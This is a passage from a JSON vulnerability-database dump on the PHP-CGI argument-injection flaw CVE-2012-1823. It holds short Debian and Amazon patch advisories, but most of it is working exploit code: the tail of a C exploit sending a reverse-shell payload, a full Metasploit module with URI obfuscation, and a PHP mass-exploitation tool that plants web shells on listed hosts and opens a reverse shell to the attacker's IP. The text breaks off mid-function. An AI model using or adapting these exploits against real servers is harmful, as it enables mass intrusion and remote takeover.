{\r\n\t case 0:\r\n\t if (optarg) {\r\n\t target = calloc(strlen(optarg)+1, sizeof(char));\r\n\t if (!target) {\r\n\t\t printf(\"calloc error (2)\\n\");\r\n\t exit(255);\r\n }\r\n\t memcpy(target, optarg, strlen(optarg)+1);\r\n \t}\r\n break;\r\n case 1:\r\n if(optarg)\r\n\t port = atoi(optarg);\r\n break;\r\n case 2:\r\n protocol = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!protocol) {\r\n\t printf(\"calloc error (3)\\n\");\r\n exit(255);\r\n }\r\n memcpy(protocol, optarg, strlen(optarg)+1);\r\n if (!strcmp(protocol, \"https\"))\r\n httpsflag=1;\r\n break;\r\n case 3:\r\n reverseip = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseip) {\r\n\t printf(\"calloc error (4)\\n\");\r\n exit(255);\r\n }\r\n memcpy(reverseip, optarg, strlen(optarg)+1); \r\n break;\r\n case 4:\r\n\t reverseport = atoi(optarg); \r\n\t\treverseportstr = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseportstr) {\r\n\t printf(\"calloc error (5)\\n\");\r\n exit(255);\r\n }\r\n memcpy(reverseportstr, optarg, strlen(optarg)+1); \t \r\n break;\r\n case 5:\r\n forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!forceinterpreter) {\r\n\t printf(\"calloc error (6)\\n\");\r\n exit(255);\r\n }\r\n memcpy(forceinterpreter, optarg, strlen(optarg)+1); \r\n break;\r\n default:\r\n usage(argv);\r\n\t }\r\n\t break;\r\n\t \r\n\t default:\r\n\t usage(argv);\r\n }\r\n }\r\n\r\n if ((optind < argc) || !target || !protocol || !port ||\r\n !reverseip || !reverseport){\r\n\tusage(argv);\r\n }\r\n \r\n server = gethostbyname_(target, port);\r\n if (!server) {\r\n printf(\"Error while resolving hostname. (7)\\n\");\r\n exit(255);\r\n }\r\n\r\n char *interpreters[5];\r\n int ninterpreters = 5;\r\n interpreters[0] = strdup(\"/cgi-bin/php\");\r\n interpreters[1] = strdup(\"/cgi-bin/php5\");\r\n interpreters[2] = strdup(\"/cgi-bin/php-cgi\");\r\n interpreters[3] = strdup(\"/cgi-bin/php.cgi\");\r\n interpreters[4] = strdup(\"/cgi-bin/php4\");\r\n \r\n for (i=0;i<ninterpreters;i++) {\r\n interpreter = interpreters[i];\r\n if (forceinterpreter) {\r\n interpreter = strdup(forceinterpreter);\r\n }\r\n if (forceinterpreter && i)\r\n break;\r\n printf(\"%s\\n\", interpreter);\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (sockfd < 1) { \r\n\t printf(\"socket error (8)\\n\");\r\n\t exit(255);\r\n }\r\n \r\n if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {\r\n printf(\"connect error (9)\\n\");\r\n exit(255);\t \r\n }\r\n if (httpsflag) {\r\n sslconnection = (connection*) malloc(sizeof(connection));\r\n if (!sslconnection) {\r\n printf(\"malloc error (10)\\n\");\r\n exit(255); \r\n }\r\n sslconnection->handle = NULL;\r\n sslconnection->ctx = NULL;\r\n\r\n SSL_library_init();\r\n\r\n sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());\r\n if (!sslconnection->ctx) {\r\n \t printf(\"SSL_CTX_new error (11)\\n\");\r\n exit(255);\r\n }\r\n\r\n sslconnection->handle = SSL_new(sslconnection->ctx);\r\n if (!sslconnection->handle) {\r\n \t printf(\"SSL_new error (12)\\n\");\r\n\t exit(255); \r\n }\r\n if (!SSL_set_fd(sslconnection->handle, sockfd)) {\r\n \t printf(\"SSL_set_fd error (13)\\n\");\r\n exit(255);\r\n }\r\n \r\n if (SSL_connect(sslconnection->handle) != 1) {\r\n\t printf(\"SSL_connect error (14)\\n\");\r\n exit(255); \r\n }\r\n }\r\n \r\n tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;\r\n tmpstr = (char*)calloc(tmpsize, sizeof(char));\r\n snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);\r\n \r\n writesize = strlen(target) + strlen(interpreter) + \r\n strlen(poststr) + strlen(tmpstr) + 64;\r\n writestr = (char*)calloc(writesize, sizeof(char));\r\n snprintf(writestr, writesize, poststr, interpreter,\r\n target, strlen(tmpstr), tmpstr);\r\n \r\n if (!httpsflag) {\r\n\t write(sockfd, writestr, strlen(writestr));\r\n\t readbuf = read_(sockfd);\r\n } else {\r\n\t SSL_write(sslconnection->handle, writestr, strlen(writestr));\r\n\t readbuf = sslread(sslconnection);\r\n }\r\n \r\n if (readbuf) {\r\n printf(\"***SERVER RESPONSE***\\n\\n%s\\n\\n\", readbuf); \r\n } else {\r\n printf(\"read error (15)\\n\");\r\n exit(255);\t \r\n }\r\n }\r\n exit(1);\r\n}\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29290/"}], "debian": [{"lastseen": "2020-11-11T13:12:54", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2465-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMay 09, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-1172 CVE-2012-1823 CVE-2012-2311\n\nDe Eindbazen discovered that PHP, when run with mod_cgi, will\ninterpret a query string as command line parameters, allowing to\nexecute arbitrary code.\n\nAdditionally, this update fixes insufficient validation of upload\nname which lead to corrupted $_FILES indices.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 5.3.3-7+squeeze9.\n\nThe testing distribution (wheezy) will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 5.4.3-1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2012-05-09T17:31:18", "published": "2012-05-09T17:31:18", "id": "DEBIAN:DSA-2465-1:8EF31", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00100.html", "title": "[SECURITY] [DSA 2465-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-13T00:16:42", "description": "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: \"if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the \"encoded in a system-defined manner\" from the RFC) and then passes them to the CGI binary.\" This module can also be used to exploit the plesk 0day disclosed by kingcope and exploited in the wild on June 2013.\n", "published": "2012-05-04T23:32:32", "type": "metasploit", "title": "PHP CGI Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/PHP_CGI_ARG_INJECTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PHP CGI Argument Injection',\n 'Description' => %q{\n When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\n an argument injection vulnerability. This module takes advantage of\n the -d flag to set php.ini directives to achieve code execution.\n From the advisory: \"if there is NO unescaped '=' in the query string,\n the string is split on '+' (encoded space) characters, urldecoded,\n passed to a function that escapes shell metacharacters (the \"encoded in\n a system-defined manner\" from the RFC) and then passes them to the CGI\n binary.\" This module can also be used to exploit the plesk 0day disclosed\n by kingcope and exploited in the wild on June 2013.\n },\n 'Author' =>\n [\n 'egypt', 'hdm', #original msf exploit\n 'jjarmoc', #added URI encoding obfuscation\n 'kingcope', #plesk poc\n 'juan vazquez' #add support for plesk exploitation\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'CVE', '2012-1823' ],\n [ 'OSVDB', '81633'],\n [ 'OSVDB', '93979'],\n [ 'EDB', '25986'],\n [ 'URL', 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],\n [ 'URL', 'http://kb.parallels.com/en/116241']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n # Arbitrary big number. The payload gets sent as an HTTP\n # response body, so really it's unlimited\n 'Space' => 262144, # 256k\n },\n 'DisclosureDate' => '2012-05-03',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DefaultTarget' => 0))\n\n register_options([\n OptString.new('TARGETURI', [false, \"The URI to request (must be a CGI-handled PHP script)\"]),\n OptInt.new('URIENCODING', [true, \"Level of URI URIENCODING and padding (0 for minimum)\",0]),\n OptBool.new('PLESK', [true, \"Exploit Plesk\", false]),\n ])\n end\n\n # php-cgi -h\n # ...\n # -s Display colour syntax highlighted source.\n def check\n\n vprint_status(\"Checking uri #{uri}\")\n\n response = send_request_raw({ 'uri' => uri })\n\n if response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi and not datastore['PLESK']\n vprint_error(\"Server responded in a way that was ambiguous, could not determine whether it was vulnerable\")\n return Exploit::CheckCode::Unknown\n end\n\n response = send_request_raw({ 'uri' => uri + \"?#{create_arg(\"-s\")}\"})\n if response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\&lt\\;\\?/mi\n return Exploit::CheckCode::Vulnerable\n end\n\n if datastore['PLESK'] and response and response.code == 500\n return Exploit::CheckCode::Appears\n end\n\n vprint_error(\"Server responded indicating it was not vulnerable\")\n return Exploit::CheckCode::Safe\n end\n\n def uri\n if datastore['PLESK']\n normalize_uri(\"phppath\", \"php\")\n else\n normalize_uri(target_uri.path).gsub(/\\?.*/, \"\")\n end\n end\n\n def uri_encoding_level\n if datastore['PLESK']\n return 0\n else\n return datastore['URIENCODING']\n end\n end\n\n def exploit\n begin\n args = [\n rand_spaces(),\n create_arg(\"-d\",\"allow_url_include=#{rand_php_ini_true}\"),\n create_arg(\"-d\",\"safe_mode=#{rand_php_ini_false}\"),\n create_arg(\"-d\",\"suhosin.simulation=#{rand_php_ini_true}\"),\n create_arg(\"-d\",'disable_functions=\"\"'),\n create_arg(\"-d\",\"open_basedir=none\"),\n create_arg(\"-d\",\"auto_prepend_file=php://input\"),\n create_arg(\"-d\", \"cgi.force_redirect=#{rand_php_ini_false}\"),\n create_arg(\"-d\", \"cgi.redirect_status_env=0\"),\n rand_opt_equiv(\"-n\")\n ]\n\n qs = args.join()\n\n # Has to be all on one line, so gsub out the comments and the newlines\n payload_oneline = \"<?php \" + payload.encoded.gsub(/\\s*#.*$/, \"\").gsub(\"\\n\", \"\")\n response = send_request_cgi( {\n 'method' => \"POST\",\n 'global' => true,\n 'uri' => \"#{uri}?#{qs}\",\n 'data' => payload_oneline,\n }, 0.5)\n handler\n\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\n print_error(\"The target service unreachable\")\n rescue ::OpenSSL::SSL::SSLError\n print_error(\"The target failed to negotiate SSL, is this really an SSL service?\")\n end\n\n end\n\n def create_arg(arg, val = nil)\n if val\n val = rand_encode(val)\n val.gsub!('=','%3d') # = must always be encoded\n val.gsub!('\"','%22') # \" too\n end\n\n ret = ''\n ret << \"#{rand_spaces}\"\n ret << \"#{rand_opt_equiv(arg)}\"\n ret << \"#{rand_space}\"\n ret << \"#{rand_spaces}\"\n ret << \"#{val}\"\n ret << \"#{rand_space}\"\n end\n\n def rand_opt_equiv(opt)\n # Returns a random equivilant option from mapping at\n # http://www.php.net/manual/en/features.commandline.options.php\n opt_equivs = {\n \"-d\" => [\n \"#{rand_dash}#{rand_encode(\"d\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"define\")}\"\n ],\n \"-s\" => [\n \"#{rand_dash}#{rand_encode(\"s\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"syntax-highlight\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"syntax-highlighting\")}\"\n ],\n \"-T\" => [\n \"#{rand_dash}#{rand_encode(\"T\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"timing\")}\"\n ],\n \"-n\" => [\n \"#{rand_dash}#{rand_encode(\"n\")}\",\n \"#{rand_dash}#{rand_dash}#{rand_encode(\"no-php-ini\")}\"\n ]\n }\n\n equivs = opt_equivs[opt]\n equivs ? equivs[rand(opt_equivs[opt].length)] : opt\n\n end\n\n def rand_encode(string, max = string.length)\n # Randomly URI encode characters from string, up to max times.\n chars = [];\n if max > uri_encoding_level then max = uri_encoding_level end\n if string.length == 1\n if rand(2) > 0\n chars << 0\n end\n else\n if max > 0\n max.times { chars << rand(string.length)}\n end\n end\n chars.uniq.sort.reverse.each{|index| string[index] = Rex::Text.uri_encode(string[index,1], \"hex-noslashes\")}\n string\n end\n\n def rand_spaces(num = uri_encoding_level)\n ret = ''\n num.times {\n ret << rand_space\n }\n ret\n end\n\n def rand_space\n uri_encoding_level > 0 ? [\"%20\",\"%09\",\"+\"][rand(3)] : \"+\"\n end\n\n def rand_dash\n uri_encoding_level > 0 ? [\"-\",\"%2d\",\"%2D\"][rand(3)] : \"-\"\n end\n\n def rand_php_ini_false\n Rex::Text.to_rand_case([ \"0\", \"off\", \"false\" ][rand(3)])\n end\n\n def rand_php_ini_true\n Rex::Text.to_rand_case([ \"1\", \"on\", \"true\" ][rand(3)])\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/php_cgi_arg_injection.rb"}], "amazon": [{"lastseen": "2020-11-10T12:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "**Issue Overview:**\n\nA flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter. ([CVE-2012-1823 __](<https://access.redhat.com/security/cve/CVE-2012-1823>))\n\n \n**Affected Packages:** \n\n\nphp\n\n \n**Issue Correction:** \nRun _yum update php_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php-dba-5.3.13-1.20.amzn1.i686 \n php-process-5.3.13-1.20.amzn1.i686 \n php-mysql-5.3.13-1.20.amzn1.i686 \n php-xml-5.3.13-1.20.amzn1.i686 \n php-pdo-5.3.13-1.20.amzn1.i686 \n php-snmp-5.3.13-1.20.amzn1.i686 \n php-mbstring-5.3.13-1.20.amzn1.i686 \n php-devel-5.3.13-1.20.amzn1.i686 \n php-xmlrpc-5.3.13-1.20.amzn1.i686 \n php-mssql-5.3.13-1.20.amzn1.i686 \n php-soap-5.3.13-1.20.amzn1.i686 \n php-odbc-5.3.13-1.20.amzn1.i686 \n php-bcmath-5.3.13-1.20.amzn1.i686 \n php-5.3.13-1.20.amzn1.i686 \n php-mcrypt-5.3.13-1.20.amzn1.i686 \n php-tidy-5.3.13-1.20.amzn1.i686 \n php-debuginfo-5.3.13-1.20.amzn1.i686 \n php-ldap-5.3.13-1.20.amzn1.i686 \n php-recode-5.3.13-1.20.amzn1.i686 \n php-fpm-5.3.13-1.20.amzn1.i686 \n php-common-5.3.13-1.20.amzn1.i686 \n php-imap-5.3.13-1.20.amzn1.i686 \n php-embedded-5.3.13-1.20.amzn1.i686 \n php-cli-5.3.13-1.20.amzn1.i686 \n php-pgsql-5.3.13-1.20.amzn1.i686 \n php-intl-5.3.13-1.20.amzn1.i686 \n php-mysqlnd-5.3.13-1.20.amzn1.i686 \n php-pspell-5.3.13-1.20.amzn1.i686 \n php-gd-5.3.13-1.20.amzn1.i686 \n \n src: \n php-5.3.13-1.20.amzn1.src \n \n x86_64: \n php-snmp-5.3.13-1.20.amzn1.x86_64 \n php-mcrypt-5.3.13-1.20.amzn1.x86_64 \n php-5.3.13-1.20.amzn1.x86_64 \n php-devel-5.3.13-1.20.amzn1.x86_64 \n php-dba-5.3.13-1.20.amzn1.x86_64 \n php-mssql-5.3.13-1.20.amzn1.x86_64 \n php-process-5.3.13-1.20.amzn1.x86_64 \n php-imap-5.3.13-1.20.amzn1.x86_64 \n php-pspell-5.3.13-1.20.amzn1.x86_64 \n php-bcmath-5.3.13-1.20.amzn1.x86_64 \n php-common-5.3.13-1.20.amzn1.x86_64 \n php-xml-5.3.13-1.20.amzn1.x86_64 \n php-odbc-5.3.13-1.20.amzn1.x86_64 \n php-debuginfo-5.3.13-1.20.amzn1.x86_64 \n php-xmlrpc-5.3.13-1.20.amzn1.x86_64 \n php-fpm-5.3.13-1.20.amzn1.x86_64 \n php-cli-5.3.13-1.20.amzn1.x86_64 \n php-pgsql-5.3.13-1.20.amzn1.x86_64 \n php-mbstring-5.3.13-1.20.amzn1.x86_64 \n php-ldap-5.3.13-1.20.amzn1.x86_64 \n php-recode-5.3.13-1.20.amzn1.x86_64 \n php-intl-5.3.13-1.20.amzn1.x86_64 \n php-soap-5.3.13-1.20.amzn1.x86_64 \n php-mysqlnd-5.3.13-1.20.amzn1.x86_64 \n php-tidy-5.3.13-1.20.amzn1.x86_64 \n php-mysql-5.3.13-1.20.amzn1.x86_64 \n php-pdo-5.3.13-1.20.amzn1.x86_64 \n php-embedded-5.3.13-1.20.amzn1.x86_64 \n php-gd-5.3.13-1.20.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-05-09T14:54:00", "published": "2012-05-09T14:54:00", "id": "ALAS-2012-077", "href": "https://alas.aws.amazon.com/ALAS-2012-77.html", "title": "Critical: php", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:39", "description": "", "published": "2012-05-22T00:00:00", "type": "packetstorm", "title": "PHP CGI Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2012-05-22T00:00:00", "id": "PACKETSTORM:112971", "href": "https://packetstormsecurity.com/files/112971/PHP-CGI-Argument-Injection.html", "sourceData": "`<?php \n \n######################################### www.bugreport.ir \n######################################## \n# \n# Title: PHP CGI Argument Injection Remote Exploit \nV0.3 - PHP Version \n# Vendor: http://www.php.net \n# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2 \n# Exploitation: Remote \n# Original Advisory: \nhttp://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ \n# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm \n# CVE: CVE-2012-1823 \n# Coded By: Mostafa Azizi (admin[@]0-Day[dot]net) \n################################################################################################### \n \n/* This tool may be used for legal purposes only. Users take full \nresponsibility for any actions performed using this tool. \nThe author accepts no liability for damage caused by this tool. If \nthese terms are not acceptable to you, then do not use this tool.*/ \n \nerror_reporting(0); \nini_set(\"max_execution_time\",0); \nini_set(\"default_socket_timeout\", 10); \nob_implicit_flush (1); \n \necho'<html> \n<head> \n<title>PHP CGI Argument Injection Remote Exploit</title> \n</head> \n<p align=\"center\"><font size=\"4\" color=\"#5E767E\">PHP CGI Argument \nInjection</font></p> \n<p align=\"center\"><font size=\"3\" color=\"#4E8975\">Coded by: Mostafa \nAzizi (admin[@]0-Day[dot]net)</font></p> \n<body bgcolor=\"#00000\"> \n<table align=\"center\" border=\"5\"> \n<tr> \n<th><p align=\"center\"><font size=\"4\" color=\"#8BB381\">Mass File \nUploader</font></p> \n</th> \n<th></th> \n<th><p align=\"center\"><font size=\"4\" color=\"#8BB381\">Reverse \nShell</font></p> \n</th> \n</tr> \n<tr> \n<td><form name=\"form1\" action=\"'.$SERVER[PHP_SELF].'\" \nenctype=\"multipart/form-data\" method=\"post\"> \n</br> \n<p></font><font color=\"#FFF8C6\" >Please specify a file to \nscan: </font></br><input type=\"file\" name=\"listfile\" \nsize=\"40\"><font color=\"#FF0000\"> * </font> \n<p></font><font color=\"#FFF8C6\" >Please specify a file to \nupload: </font></br><input type=\"file\" name=\"datafile\" \nsize=\"40\"><font color=\"#FF0000\"> * </font> \n<p><font color=\"#FFF8C6\" > specify a port (default is 80): \n</font></br><input name=\"port\" size=\"20\"><span \nclass=\"Stile5\"></span></p> \n<p><font color=\"#FFF8C6\" > Proxy (ip:port): \n</font></br><input name=\"proxy\" size=\"20\"><span \nclass=\"Stile5\"></span></p> \n<p align=\"center\"> <span class=\"Stile5\"><font \ncolor=\"#FF0000\">* </font><font color=\"white\" >fields are \nrequired</font></font></span></p> \n</br> \n<p align=\"center\"><input type=\"submit\" value=\"Start Attack\" \nname=\"Submit\"></p> \n</form> </td> \n<td></td> \n<td><form name=\"form1\" action=\"'.$SERVER[PHP_SELF].'\" \nenctype=\"multipart/form-data\" method=\"post\"> \n</br> \n<p></font><font color=\"#FFF8C6\" > hostname (ex: \nwww.sitename.com):</font></br><input name=\"host\" size=\"20\"> <span \nclass=\"Stile5\"></span></p> \n<p></font><font color=\"#FFF8C6\" > Your IP (ex: \n173.194.35.169 ): </font></br><input name=\"lip\" size=\"20\"> \n<span class=\"Stile5\"></span></p> \n<p><font color=\"#FFF8C6\" > Your Port (ex: \n80):</font></br><input name=\"lport\" size=\"20\"> <span \nclass=\"Stile5\"></span></p> \n</br></br> \n<p align=\"center\"> <span class=\"Stile5\"><font \ncolor=\"#FF0000\">All </font><font color=\"white\" >fields are \nrequired</font></font></span></p> \n</br> \n<p align=\"center\"><input type=\"submit\" value=\"Start Attack\" \nname=\"Submit2\"></p> \n</form> </td> \n</tr> \n</table> \n</font> \n<table width=\"90%\"> \n<tbody> \n<tr> \n<td width=\"43%\" align=\"left\"> \n \n</td> \n</tr> \n</tbody> \n</table> \n</body></html>'; \n \n$host = $_POST['host']; \n$lip = $_POST['lip']; \n$lport = $_POST['lport']; \n$port = $_POST['port']; \n$proxy = $_POST['proxy']; \n$list = file($_FILES['listfile']['tmp_name']); \n$file = \nbase64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name']))); \n$shell = \"gzinflate(base64_decode(\\\"$file\\\"))\"; \n \nif (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '') \n{ \n/*pentestmonkey's php-reverse-shell. \nLimitations: proc_open and stream_set_blocking require PHP version \n4.3+, or 5+ */ \n \n/* Connect Back */ \n \n$payload = \"<?php set_time_limit (0); \\$VERSION = \\\"1.0\\\"; \\$ip = \n'$lip'; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null; \n\\$error_a = null; \\$shell = 'uname -a; w; id; /bin/sh -i'; \\$daemon = \n0;\\$debug = 0; if (function_exists('pcntl_fork')) { \\$pid = \npcntl_fork(); if (\\$pid == -1) { printit(\\\"ERROR: Can't fork\\\"); \nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) { \nprintit(\\\"Error: Can't setsid()\\\"); exit(1); } \\$daemon = 1;} else { \nprintit(\\\"WARNING: Failed to daemonise. This is quite common and not \nfatal.\\\");}chdir(\\\"/\\\"); umask(0); \\$sock = fsockopen(\\$ip, \\$port, \n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\\"\\$errstr (\\$errno)\\\"); \nexit(1);} \\$descriptorspec = array(0 => array(\\\"pipe\\\", \\\"r\\\"),1 => \narray(\\\"pipe\\\", \\\"w\\\"), 2 => array(\\\"pipe\\\", \\\"w\\\"));\\$process = \nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if \n(!is_resource(\\$process)) { printit(\\\"ERROR: Can't spawn shell\\\"); \nexit(1);}stream_set_blocking(\\$pipes[0], \n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2], \n0);stream_set_blocking(\\$sock, 0);printit(\\\"Successfully opened \nreverse shell to \\$ip:\\$port\\\"); while (1) { if (feof(\\$sock)) { \nprintit(\\\"ERROR: Shell connection terminated\\\"); break;} if \n(feof(\\$pipes[1])) {printit(\\\"ERROR: Shell process \nterminated\\\");break;}\\$read_a = array(\\$sock, \\$pipes[1], \n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a, \n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug) \nprintit(\\\"SOCK READ\\\");\\$input = fread(\\$sock, \n\\$chunk_size);if(\\$debug) printit(\\\"SOCK: \n\\$input\\\");fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1], \n\\$read_a)) {if (\\$debug) printit(\\\"STDOUT READ\\\");\\$input = \nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\\"STDOUT: \n\\$input\\\");fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2], \n\\$read_a)) {if (\\$debug) printit(\\\"STDERR READ\\\");\\$input = \nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\\"STDERR: \n\\$input\\\");fwrite(\\$sock, \n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print \\\"\\$string\\n\\\";}} \n?>\"; \n$packet = \"POST \n\".$p.\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \nHTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter\\r\\n\"; \n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\\r\\n\"; \n$packet .= $payload.\"\\r\\n\\r\\n\\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n \n}elseif (isset($_POST['Submit']) && $list != '' && $file != '') \n{ \nif ($port=='') {$port=80;} \n \nfor ($n =0; $n < count($list); $n++) \n{ \n \n$siteAddbackup = $list[$n]; \n$siteAdd=str_replace(\"http://\",\"\",$siteAddbackup); \n \npreg_match('/^(?:(?:http|https):\\/\\/)?[^\\/]+(\\/.+\\/)[^\\/\\.]+\\.[^\\/\\.]+$/i',$siteAddbackup, \n$match); \n$path = $match[1]; \n$pa = strstr(trim($siteAdd),$path); \n$host=trim(str_replace($pa,\"\",$siteAdd)); \nif ($path ==''){$path = \"/\"; } \nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;} \n \n/* Checking \nAvailability */ \n \n$connection = fsockopen($host,$port); \nif (!$connection) \n// site is down \n{ \necho '<font color=red> No response from \n'.htmlentities($host).' ...<br></font>'; \n \nfile_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', \n$siteAddbackup.\"\\r\\n\", FILE_APPEND); \n} \nelse \n// site is up \n{ \nfclose($connection); \nExploitable($host,$path,$p); \n} \n \n} \n} \n \nFunction Exploitable($host,$path,$p) \n{ \nglobal $html; \n$i=0; \n/* Checking Exploitability */ \n$packet = \"GET \".$p.\"?-s HTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter \\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n$str = array( \n'<code><span','<?'); \nforeach ($str as $value => $search){ \nif(stristr($html, $search) == TRUE) \n{$i=$i+1;}} \nswitch($i) \n{ \ncase 0: \necho '<font color=red>'.$host.' Faild!<br></font>'; \nbreak; \ncase 2: \necho '<font color=#FFF8C6>'.$host.' Exploitable<br></font>'; \nExploit($host,$path,$p); \n} \n} \n \nFunction Exploit($host,$path,$p) \n{ \nglobal $html, $shell; \n/* Exploiting */ \n \n$payload = \"<?php \\$myFile = \\\"legalpentest.php\\\"; \\$filehandle = \nfopen(\\$myFile, 'w') or die(\\\"can't open file\\\"); \\$Data=$shell; \nfwrite(\\$filehandle, \\$Data);fclose(\\$filehandle);\"; \n$packet = \"POST \n\".$p.\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \nHTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter\\r\\n\"; \n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\\r\\n\"; \n$packet .= $payload.\"\\r\\n\\r\\n\\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n/* Check for successfully \nuploaded */ \n$packet = \"HEAD \".$p.\"/legalpentest.php HTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: :) \\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n \nif(stristr($html , '404 Not Found') == true) \n{ \necho '<font color=#FFF8C6><br>Exploit \nFaild...<br>-------------------------------------------------------<br></font>'; \n} \nelse { \necho \"<font color=#FFF8C6><br>Exploit \nSucceeded...<br>http://$host$path\".\"/legalpentest.php<br>-------------------------------------------------------<br></font>\"; \nfile_put_contents(realpath(dirname(__FILE__)).'/shell.txt', \n\"http://$host$path\".\"/legalpentest.php\\r\\n\", FILE_APPEND); \n} \n} \n \n \nfunction sendpacket($packet,$response = 0,$output = 0,$s=0) \n{ \n$proxy_regex = 